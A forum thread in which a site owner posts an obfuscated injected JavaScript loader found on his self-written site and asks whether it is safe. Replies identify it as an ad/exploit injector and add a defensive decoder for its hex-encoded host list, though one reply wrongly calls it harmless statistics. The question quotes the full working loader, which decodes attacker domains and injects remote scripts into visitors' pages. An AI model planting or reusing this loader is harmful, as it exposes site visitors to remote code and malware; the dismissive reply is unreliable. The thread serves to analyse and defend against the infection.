Malware
Denis Vasiliev, 2016-02-25 22:14:32

Is the script safe?

Tell me, I found about a hundred suspicious scripts on my site. What do they do, and are they safe? The engine is self-written, so it's hard to decide. The JS itself:

<script type="mce-text/javascript">// <![CDATA[
window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21677",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "stroimdvor.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var 
u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
// ]]></script>

3 answer(s)
Mark Doe, 2016-02-26
@good_job

Definitely unsafe. You have a hole in your system; it's a so-called iframe cloak injector.
It loads auto-generated domains like uuidksinc.net, which contain a "payload"; in your case, the script shows ads like this.
In your case, it would be great to use a WAF or a web antivirus like Yandex.Manul and check: at some point such a frame may start serving an exploit pack instead of advertising (a set of scripts that exploit vulnerabilities and can lead to your users being infected with malware), and as a result your site will fall under sanctions from SafeBrowsing etc.
In general, seriously consider auditing your engine, because this situation can happen again with more catastrophic consequences.
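
A static decoder for the hex-encoded host list in the script from the question, as an added example that is not part of the original thread. It mirrors the sample's own `a()` and `r()` helpers without executing the sample; the function names (`hexToAscii`, `asciiToHex`, `extractLoaderHosts`, `loaderPath`) are made up for this illustration.

```javascript
// Decode a string of hex byte pairs, mirroring the sample's own a() helper.
function hexToAscii(hex) {
  return (hex.match(/[0-9a-f]{2}/gi) || [])
    .map((pair) => String.fromCharCode(parseInt(pair, 16)))
    .join('');
}

// Hex-encode a hostname the way the sample's r() does (strips "www." first).
function asciiToHex(host) {
  return Array.from(host.replace('www.', ''), (ch) => ch.charCodeAt(0).toString(16)).join('');
}

// Pull every JSON.parse('[...]') literal out of page source and keep entries
// that are pure hex and decode to something shaped like a hostname.
function extractLoaderHosts(source) {
  const hosts = [];
  const literal = /JSON\.parse\('(\[[^']*\])'\)/g;
  for (const match of source.matchAll(literal)) {
    let items;
    try { items = JSON.parse(match[1]); } catch (err) { continue; } // not valid JSON: skip
    if (!Array.isArray(items)) continue;
    for (const item of items) {
      if (typeof item !== 'string' || !/^(?:[0-9a-f]{2})+$/i.test(item)) continue;
      const decoded = hexToAscii(item);
      if (/^[a-z0-9-]+(\.[a-z0-9-]+)+$/i.test(decoded)) hosts.push(decoded);
    }
  }
  return hosts;
}

// Build the request path the loader asks each host for, so it can be searched
// for in proxy logs or CSP reports. framed=false is the top-level page case.
function loaderPath(campaignId, siteHost, framed) {
  return `/ajs/${campaignId}/c/${asciiToHex(siteHost)}_${framed ? 1 : 0}.js`;
}

// Excerpt of the script quoted in the question (hex host list and id only).
const SAMPLE = `!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21677"`;

console.log(extractLoaderHosts(SAMPLE));
console.log(loaderPath('21677', 'stroimdvor.ru', false));
```

Running `extractLoaderHosts` over each of the affected files gives the full set of hosts to block and to search for in outbound request logs.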

Paul Denisevich, 2016-02-25
@deniamnet

1) it's not entirely clear what PHP has to do with it.
2) it looks like some kind of virus and/or XSS. I advise you to remove it and see what happens (most likely, nothing will happen to the site itself); normal scripts (when nothing needs to be hidden) are not written like that.

My joy, 2016-02-25
@t-alexashka

What does safe mean? It sends some statistics to some site. If it was set up deliberately, then there should be no problems.